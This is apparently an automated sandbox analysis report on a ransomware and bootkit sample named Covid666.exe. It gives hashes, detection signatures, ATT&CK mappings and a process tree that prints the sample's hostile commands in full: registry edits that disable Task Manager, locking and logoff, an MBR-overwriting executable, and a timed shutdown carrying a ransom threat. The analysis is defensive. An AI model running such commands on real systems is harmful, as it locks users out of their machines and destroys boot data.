70971148ed1fadb17a1de707b03b0b61bcf9d523c540b9bf4e411b5bb0dda5f0

Analysis

max time kernel
246s
max time network
253s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2024, 18:35

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Covid666.exe
Size

687KB
MD5

0c303ae1347c0395a96f3eb38d26d7ed
SHA1

c8cf473a22fc86ddad00ec286e94422f4b7d5c59
SHA256

1eefaeb98524277d1aeb459b6e4a31472ce2f4ff15f8f45b051e1c8a021c8fa7
SHA512

57e9ca4e5339164a6c3e5f53b8f30410d86139355390e17a2926d5b2263a511f0d47b26f70e95a5cf8daf4c365fec7f057614636e6f092d8320fcdda8debea93
SSDEEP

12288:U7M23cFQpIn5tghlAjyCey1vLd31utolsqHzc30qOocuXi7oS:Ug2sq2nohlAtrvLjutQtI3bOoli

Score

8^/10

bootkit evasion persistence ransomware upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	Covid666.exe

Executes dropped EXE 2 IoCs

pid	Process
2416	mbr.exe
3680	MainWindow.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral10/memory/1972-0-0x0000000000400000-0x000000000064F000-memory.dmp	upx
behavioral10/memory/1972-25-0x0000000000400000-0x000000000064F000-memory.dmp	upx

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	mbr.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "251"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
556	reg.exe
1752	reg.exe
1784	reg.exe
4872	reg.exe
692	reg.exe
4944	reg.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4508	shutdown.exe
Token: SeRemoteShutdownPrivilege	4508	shutdown.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3680	MainWindow.exe
3992	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 3520	1972	Covid666.exe	89
PID 1972 wrote to memory of 3520	1972	Covid666.exe	89
PID 1972 wrote to memory of 3520	1972	Covid666.exe	89
PID 3520 wrote to memory of 556	3520	cmd.exe	92
PID 3520 wrote to memory of 556	3520	cmd.exe	92
PID 3520 wrote to memory of 556	3520	cmd.exe	92
PID 3520 wrote to memory of 1752	3520	cmd.exe	93
PID 3520 wrote to memory of 1752	3520	cmd.exe	93
PID 3520 wrote to memory of 1752	3520	cmd.exe	93
PID 3520 wrote to memory of 1784	3520	cmd.exe	94
PID 3520 wrote to memory of 1784	3520	cmd.exe	94
PID 3520 wrote to memory of 1784	3520	cmd.exe	94
PID 3520 wrote to memory of 4872	3520	cmd.exe	95
PID 3520 wrote to memory of 4872	3520	cmd.exe	95
PID 3520 wrote to memory of 4872	3520	cmd.exe	95
PID 3520 wrote to memory of 692	3520	cmd.exe	96
PID 3520 wrote to memory of 692	3520	cmd.exe	96
PID 3520 wrote to memory of 692	3520	cmd.exe	96
PID 3520 wrote to memory of 2416	3520	cmd.exe	98
PID 3520 wrote to memory of 2416	3520	cmd.exe	98
PID 3520 wrote to memory of 2416	3520	cmd.exe	98
PID 3520 wrote to memory of 1052	3520	cmd.exe	99
PID 3520 wrote to memory of 1052	3520	cmd.exe	99
PID 3520 wrote to memory of 1052	3520	cmd.exe	99
PID 3520 wrote to memory of 4752	3520	cmd.exe	100
PID 3520 wrote to memory of 4752	3520	cmd.exe	100
PID 3520 wrote to memory of 4752	3520	cmd.exe	100
PID 3520 wrote to memory of 2272	3520	cmd.exe	101
PID 3520 wrote to memory of 2272	3520	cmd.exe	101
PID 3520 wrote to memory of 2272	3520	cmd.exe	101
PID 3520 wrote to memory of 3416	3520	cmd.exe	102
PID 3520 wrote to memory of 3416	3520	cmd.exe	102
PID 3520 wrote to memory of 3416	3520	cmd.exe	102
PID 3520 wrote to memory of 4860	3520	cmd.exe	103
PID 3520 wrote to memory of 4860	3520	cmd.exe	103
PID 3520 wrote to memory of 4860	3520	cmd.exe	103
PID 3520 wrote to memory of 4944	3520	cmd.exe	104
PID 3520 wrote to memory of 4944	3520	cmd.exe	104
PID 3520 wrote to memory of 4944	3520	cmd.exe	104
PID 3520 wrote to memory of 3680	3520	cmd.exe	105
PID 3520 wrote to memory of 3680	3520	cmd.exe	105
PID 3520 wrote to memory of 3680	3520	cmd.exe	105
PID 3520 wrote to memory of 4508	3520	cmd.exe	106
PID 3520 wrote to memory of 4508	3520	cmd.exe	106
PID 3520 wrote to memory of 4508	3520	cmd.exe	106
PID 3520 wrote to memory of 2104	3520	cmd.exe	108
PID 3520 wrote to memory of 2104	3520	cmd.exe	108
PID 3520 wrote to memory of 2104	3520	cmd.exe	108
PID 3520 wrote to memory of 1660	3520	cmd.exe	109
PID 3520 wrote to memory of 1660	3520	cmd.exe	109
PID 3520 wrote to memory of 1660	3520	cmd.exe	109
PID 3520 wrote to memory of 2008	3520	cmd.exe	110
PID 3520 wrote to memory of 2008	3520	cmd.exe	110
PID 3520 wrote to memory of 2008	3520	cmd.exe	110
PID 3520 wrote to memory of 1240	3520	cmd.exe	111
PID 3520 wrote to memory of 1240	3520	cmd.exe	111
PID 3520 wrote to memory of 1240	3520	cmd.exe	111
PID 3520 wrote to memory of 1120	3520	cmd.exe	112
PID 3520 wrote to memory of 1120	3520	cmd.exe	112
PID 3520 wrote to memory of 1120	3520	cmd.exe	112
PID 3520 wrote to memory of 1136	3520	cmd.exe	113
PID 3520 wrote to memory of 1136	3520	cmd.exe	113
PID 3520 wrote to memory of 1136	3520	cmd.exe	113
PID 3520 wrote to memory of 4032	3520	cmd.exe	114

C:\Users\Admin\AppData\Local\Temp\Covid666.exe
"C:\Users\Admin\AppData\Local\Temp\Covid666.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\Covid666.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:556
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1752
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1784
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4872
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:692
- - C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\mbr.exe
    mbr.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    PID:2416
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1052
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4944
- - C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\MainWindow.exe
    MainWindow.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3680
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 240 /c "You have only 4 minutes to complete the payment or all your data is lost forever"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2104
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1568

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3927855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\Covid666.bat

Filesize
1KB

MD5
5e19b2eeb24514e87aa6039bd012fa6e

SHA1
4f8ad456f7050a8fa572043dc42a0ae5bd0dc6a5

SHA256
0cabbe47e3a8799502084b4c691634d16dc3bf317fc17d9d898ed336a476c778

SHA512
8c9faabd001af53f081c2fe38bd3c930de8c4aa1813afb66b106ffbdd796040b1dcc11ddccf965edf100283f38e587d4d937cbb4455379317ce5a5b59b7c8cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\MainWindow.exe

Filesize
20KB

MD5
23ab00deb47223ba73b700eb371fb0fe

SHA1
ba2e077c3790bdae4083fe9283f38a13efdcc4b1

SHA256
d42807867bd69d5db2605e4e6f39e5f70e0cc9db0cac9216fd6a9cd8cc324e0d

SHA512
d37252a1620f532230160f16c5d87fc79928842c0af41805c1fed1115ef0cfca6767d48c5d9ce6c6a4b042cd152cd1a2f9b49ad9380b08980680b26c5a4805c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\mbr.exe

Filesize
173KB

MD5
95e58913cd88dbf98583c2acb5e867af

SHA1
4f09c6fc9360047baddb044fd2aa6dc50ee356ed

SHA256
c56929dc58ee31e253cfadb1d402d241a9f48187c8a95ee720dff781219b35a3

SHA512
184e808651f0d85295d09f7f46b9bd82db4339085b1e5c5c2d70ee8d2f1bc1dd17c68c988a671bcf7f70e6bd92752d774f85b4813a5f6bc48b67298a846fc812

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\mbr.exe

Filesize
128KB

MD5
593a17293416580b5076bfdaaf55f0f0

SHA1
da5b0c4d23179b1fdc27d9e1f7d57d39c9b4feb0

SHA256
9adfc03905dc4ce5e4ae7b2e71905443dbca84048c16950babc2cf0c40215dba

SHA512
e1c45e8f500ecf56bd555bc3469b236b47b90eed2bdcfc9c4a1894e8272f253425c0891a3cee93ae06f277d927b69a6017ab35d1f954e6b72d8d770ad77cdfa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B0C.tmp\note.bmp

Filesize
128KB

MD5
b8bcf81fdbe2c0eeded267b5624a64f8

SHA1
14538383b82b344f72668bd1213dfca359dc1881

SHA256
fa6a49b0c0b931123c650f2d414f7e14f50c3e7185092442fab030885d477bbf

SHA512
b1fa301625fd5768885ac702e172a87ec1a8e74f046732996869f7fcd1c2881b971d89a3db1d5d27278589e45b51f706c87e7db0083774c502f3a83181c9f034

Download Submit
memory/1972-0-0x0000000000400000-0x000000000064F000-memory.dmp

Filesize
2.3MB

Download
memory/1972-25-0x0000000000400000-0x000000000064F000-memory.dmp

Filesize
2.3MB

Download
memory/2416-17-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads